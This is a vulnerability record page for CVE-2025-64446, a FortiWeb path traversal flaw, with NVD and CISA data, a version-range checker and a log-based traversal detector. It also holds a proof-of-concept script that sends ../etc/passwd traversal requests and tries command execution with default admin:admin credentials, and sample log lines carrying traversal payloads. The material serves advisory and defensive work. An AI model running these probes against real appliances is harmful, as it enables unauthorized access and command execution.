Security Vulnerability Report
CVE-2025-64446 CVSS 9.8 CRITICAL

CVE-2025-64446

Published: 2025-11-14 16:15:59
Last Modified: 2025-11-21 18:27:34

Description

A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.

Weakness: CWE-23 (Relative Path Traversal)
CISA KEV: listed as "Fortinet FortiWeb Path Traversal Vulnerability", added 2025-11-14, required action due 2025-11-21 (apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable). The KEV listing means exploitation in the wild has been confirmed, and the CVSS vector (PR:N, UI:N, AV:N) describes an attack that needs neither credentials nor user interaction, so exposed management interfaces should be treated as already probed.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* versionStartIncluding 8.0.0, versionEndExcluding 8.0.2 - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* versionStartIncluding 7.6.0, versionEndExcluding 7.6.5 - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* versionStartIncluding 7.4.0, versionEndExcluding 7.4.10 - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* versionStartIncluding 7.2.0, versionEndExcluding 7.2.12 - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* versionStartIncluding 7.0.0, versionEndExcluding 7.0.12 - VULNERABLE
FortiWeb 8.0.0 - 8.0.1 (fixed in 8.0.2)
FortiWeb 7.6.0 - 7.6.4 (fixed in 7.6.5)
FortiWeb 7.4.0 - 7.4.9 (fixed in 7.4.10)
FortiWeb 7.2.0 - 7.2.11 (fixed in 7.2.12)
FortiWeb 7.0.0 - 7.0.11 (fixed in 7.0.12)
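NVD version ranges are half-open (versionStartIncluding up to but excluding versionEndExcluding), so the exclusive bound is the first fixed build. The example below is added here and is not part of the original page: it reads an excerpt of this record's configurations block (matchCriteriaId fields dropped) and classifies a build as vulnerable, fixed, or not covered by the record. The third state matters because a branch the record does not list (6.x, for instance) is "unknown", not "safe". The function names and the three status labels are mine.

```python
import re
from typing import Dict, Iterable, Optional, Tuple

# Excerpt of the "configurations" block of this NVD record (matchCriteriaId
# fields dropped). Each range is half-open: versionStartIncluding <= v < versionEndExcluding.
NVD_CONFIGURATIONS = [{"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [
    {"vulnerable": True, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.12"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.12"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.10"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2"},
]}]}]

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'7.4.9' -> (7, 4, 9). Build suffixes such as '7.4.9-build1234' are
    rejected on purpose: strip them before calling rather than guessing."""
    if not re.fullmatch(r"\d+(?:\.\d+)*", text):
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def padded(v: Version, width: int) -> Version:
    """Right-pad with zeros so (7, 4) and (7, 4, 0) compare equal."""
    return v + (0,) * (width - len(v))


def vulnerable_matches(configurations: list, product: str) -> Iterable[dict]:
    """Yield every cpeMatch entry flagged vulnerable for the given vendor:product."""
    for config in configurations:
        for node in config.get("nodes", []):
            for match in node.get("cpeMatch", []):
                if match.get("vulnerable") and f":{product}:" in match.get("criteria", ""):
                    yield match


def in_range(v: Version, match: dict) -> bool:
    """True if v satisfies the bounds carried by one cpeMatch entry. Handles the
    three NVD bound keys and open-ended ranges (a missing key means no bound)."""
    lo = match.get("versionStartIncluding")
    hi_excl = match.get("versionEndExcluding")
    hi_incl = match.get("versionEndIncluding")
    bounds = [parse_version(b) for b in (lo, hi_excl, hi_incl) if b]
    width = max([len(v)] + [len(b) for b in bounds])
    key = padded(v, width)
    if lo and key < padded(parse_version(lo), width):
        return False
    if hi_excl and key >= padded(parse_version(hi_excl), width):
        return False
    if hi_incl and key > padded(parse_version(hi_incl), width):
        return False
    return True


def assess(version: str, configurations: list = NVD_CONFIGURATIONS,
           product: str = "fortinet:fortiweb") -> Dict[str, Optional[str]]:
    """Classify a build as 'vulnerable', 'fixed' (same major.minor branch, at or
    past the fix) or 'not_in_record' (the record says nothing about that branch)."""
    v = parse_version(version)
    branch_listed = False
    for match in vulnerable_matches(configurations, product):
        if in_range(v, match):
            return {"version": version, "status": "vulnerable",
                    "fixed_in": match.get("versionEndExcluding")}
        lo = match.get("versionStartIncluding")
        if lo and parse_version(lo)[:2] == v[:2]:
            branch_listed = True
    status = "fixed" if branch_listed else "not_in_record"
    return {"version": version, "status": status, "fixed_in": None}


if __name__ == "__main__":
    for build in ("7.0.11", "7.4.9", "7.4.10", "7.6.5", "8.0.1", "8.0.2", "6.4.3"):
        print(assess(build))
```

Feed it the version string reported by the appliance with any build suffix stripped; the same assess() works unchanged on the configurations block of any other NVD record once the product key is swapped.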

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests
import urllib3

# CVE-2025-64446 PoC - FortiWeb Path Traversal leading to RCE
# Target: Fortinet FortiWeb < 7.0.12, < 7.2.12, < 7.4.10, < 7.6.5, < 8.0.2

# Every request below uses verify=False; silence the per-request warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def check_vulnerability(target_url):
    """Check if target is vulnerable to CVE-2025-64446.

    This is a generic file-read traversal probe: it appends ../../../../etc/passwd
    to management API paths and looks for "root:". The advisory describes the
    flaw as allowing execution of administrative commands, so a 200 without
    "root:" is not confirmation of anything; it only means the endpoint answered.
    """
    # Path traversal payload to access /etc/passwd
    path_traversal_payload = "../../../../etc/passwd"

    # Common FortiWeb management endpoints
    endpoints = [
        "/api/v2.0/cmdb/system/admin",
        "/api/v2.0/cmdb/log/attack-log",
        "/api/v2.0/cmdb/waf/profile",
        "/api/v2.0/cmdb/server-policy/connection",
        "/api/v2.0/cmdb/system/global",
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-64446-PoC)",
        "Accept": "application/json",
    }

    print(f"[*] Testing target: {target_url}")
    print("[*] Vulnerability: CVE-2025-64446 (Path Traversal in FortiWeb)")

    for endpoint in endpoints:
        url = f"{target_url}{endpoint}/{path_traversal_payload}"
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            # Check for successful file access (path traversal successful)
            if response.status_code == 200 and "root:" in response.text:
                print(f"[!] VULNERABLE: {endpoint}")
                print(f"[+] Leaked content:\n{response.text[:500]}")
                return True
            elif response.status_code == 200:
                print(f"[+] Potential path traversal at {endpoint}")
                print(f"[+] Response length: {len(response.text)}")
        except requests.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")

    print("[*] No obvious path traversal detected (may require authentication)")
    return False


def exploit_rce(target_url, cmd="whoami"):
    """Attempt to execute commands via FortiWeb management interface.

    No traversal is involved here: the function POSTs {"command": cmd} to three
    guessed CLI-style endpoints with default admin:admin Basic credentials and
    treats any 200 as success, which will false-positive on endpoints that
    answer 200 to unknown input. It is not called from the entry point below.
    """
    # Guessed FortiWeb CLI API endpoints
    endpoints = [
        "/api/v2.0/cli",
        "/api/v2.0/cmdb/system/console",
        "/api/v2.0/exec",
    ]

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/json",
        "Authorization": "Basic YWRtaW46YWRtaW4=",  # admin:admin (default)
    }
    data = {"command": cmd}

    for endpoint in endpoints:
        try:
            url = f"{target_url}{endpoint}"
            response = requests.post(url, json=data, headers=headers, timeout=10, verify=False)
            if response.status_code == 200:
                print(f"[!] Command execution successful via {endpoint}")
                print(f"[+] Output: {response.text}")
                return True
        except requests.RequestException:
            pass

    print("[-] RCE attempt failed (may require authentication or different endpoint)")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-64446.py <target_url>")
        print("Example: python cve-2025-64446.py https://fortiweb.example.com")
        sys.exit(1)

    target = sys.argv[1].rstrip("/")
    check_vulnerability(target)
```
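The PoC above sends traversal sequences under /api/v2.0/ paths; the defensive counterpart is spotting them in access logs after the fact. The detector below is an added example and is not from the original page or from Fortinet. It percent-decodes each request target repeatedly (to catch double encoding), resolves "." and ".." segments the way a file system would, and reports whether the resolved path escapes the API root. The log lines are constructed for the example, the /api/v2.0/ prefix is taken from the PoC's endpoint list, and nothing here asserts which exact path the real exploit uses.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed access-log lines, not real FortiWeb logs: a benign API call, the
# traversal shape the PoC above sends, a percent-encoded variant, a
# double-encoded variant, a traversal placed after an encoded '?', and a benign
# request whose query string merely contains "..".
SAMPLE_LOG = """\
203.0.113.5 - - [14/Nov/2025:16:20:01 +0000] "GET /api/v2.0/cmdb/system/admin HTTP/1.1" 200 512
203.0.113.5 - - [14/Nov/2025:16:20:02 +0000] "GET /api/v2.0/cmdb/system/admin/../../../../etc/passwd HTTP/1.1" 404 0
198.51.100.7 - - [14/Nov/2025:16:21:10 +0000] "GET /api/v2.0/cmdb/log/attack-log/..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1800
198.51.100.7 - - [14/Nov/2025:16:21:11 +0000] "GET /api/v2.0/cmdb/waf/profile/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1800
198.51.100.7 - - [14/Nov/2025:16:21:12 +0000] "POST /api/v2.0/cmdb/system/admin%3F/../../../../cgi-bin/ HTTP/1.1" 200 0
203.0.113.5 - - [14/Nov/2025:16:22:00 +0000] "GET /api/v2.0/cmdb/waf/profile?name=my..profile HTTP/1.1" 200 340
"""

API_ROOT = "/api/v2.0/"   # taken from the endpoint list in the PoC above

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that a
    double-encoded %252e%252e is seen as '..' just as a decoding backend would."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def resolve(target: str) -> Tuple[str, bool]:
    """Resolve '.' and '..' segments of the decoded request-target the way a
    file system would. Returns (resolved_path, saw_dotdot). The whole target is
    segmented, query string included, because a backend may decode before it
    splits on '?', and a literal '?' does not stop traversal in a file path."""
    decoded = fully_decode(target).replace("\\", "/")
    stack: List[str] = []
    saw_dotdot = False
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            saw_dotdot = True
            if stack:
                stack.pop()
            continue
        stack.append(segment)
    return "/" + "/".join(stack), saw_dotdot


def classify(target: str, api_root: str = API_ROOT) -> Optional[str]:
    """Label a request-target, or return None when no '..' segment is present."""
    resolved, saw_dotdot = resolve(target)
    if not saw_dotdot:
        return None
    if resolved.startswith(api_root):
        return "dotdot_inside_api"        # stays under the API root; still odd for an API client
    return "traversal_escapes_api"        # leaves the API root after resolution


def scan(log_text: str) -> List[dict]:
    """Run classify() over every parseable request line and collect findings."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        label = classify(m["target"])
        if label:
            findings.append({"src": m["src"], "ts": m["ts"], "method": m["method"],
                             "target": m["target"], "status": int(m["status"]),
                             "finding": label, "resolved": resolve(m["target"])[0]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['src']:14} {f['finding']:22} {f['method']} {f['target']} -> {f['resolved']}")
```

Two design points: the status code is recorded but not used as a filter, because a traversal that reached a handler can return 200, 404 or 500 depending on what it hit, and the query string is not stripped before segmenting, because the last sample line shows that ".." inside a query value is harmless while ".." as a path segment after an encoded "?" is not.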

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-910 (Vendor Advisory)
https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass (Exploit, Third Party Advisory)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64446 (US Government Resource)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64446", "sourceIdentifier": "[email protected]", "published": "2025-11-14T16:15:58.567", "lastModified": "2025-11-21T18:27:33.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-11-14", "cisaActionDue": "2025-11-21", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Fortinet FortiWeb Path Traversal Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.12", "matchCriteriaId": "CDE13E2A-CEC3-4FC7-98AD-11CA1EAEC0C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.12", "matchCriteriaId": "551127B2-DCE9-403D-8073-ACD717CD0B19"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.10", "matchCriteriaId": "83212B0A-5EEF-4FA7-89C5-5E4D687CBB07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "D358CE92-A30D-4058-8D12-00376E4B9074"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "F1DD8ABA-9BB5-4ED8-9E34-1CB0752651DF"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-910", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64446", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}